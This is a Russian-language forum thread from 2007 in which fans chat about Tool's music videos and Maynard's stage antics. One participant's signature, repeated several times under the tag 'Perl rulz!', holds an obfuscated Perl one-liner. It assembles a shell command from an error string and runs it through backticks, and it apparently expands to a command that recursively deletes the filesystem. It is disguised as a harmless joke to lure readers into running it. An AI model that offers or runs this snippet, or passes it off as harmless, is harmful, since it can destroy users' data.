Добавлено: Вс Янв 21, 2007 9:37 am Заголовок сообщения:
начинать по-моему лучше с клипов =) всегда
я впервые услышал когда увидел по телеку клип sober, запомнилось надолго, но было давно, и тогда когда я его видел у меня не было возможности гдето искать качать, да и потом я название не запомнил, потом увидел клип stinkfist, запомнил, и т.д.
есть клипы у меня:
- Sober
- Prison Sex
- Stinkfist
- Schism
это кажется не все, но если нужно я залью что-то из этого _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
ржалъ над майнардом в трусах
от крика чуть ни обосралсо _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Походу либо Тул не понравился, поэтому все пишут о Гриндэй/Рансид, либо настолько залипли на Тул, что ничего писать о нем не могут)) _________________ Fortuna non penis in manus non recipe
ну я то давно слушаю их
что писать и так все ясно
Maynard
выложи фотку фартука майнарда,женский коллектив на нее слетиться сейчас)) _________________ АЙС
ржалъ над майнардом в трусах
от крика чуть ни обосралсо
Да, жаль он голос сорвал...
Кстати вот только заметил, что когда Мэйнард петь начинает - там еще и Дэнни выбегает - начинает по ударным стучать)) _________________ Fortuna non penis in manus non recipe
до этого видимо посторонними делами занимался, если не замечал
_________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!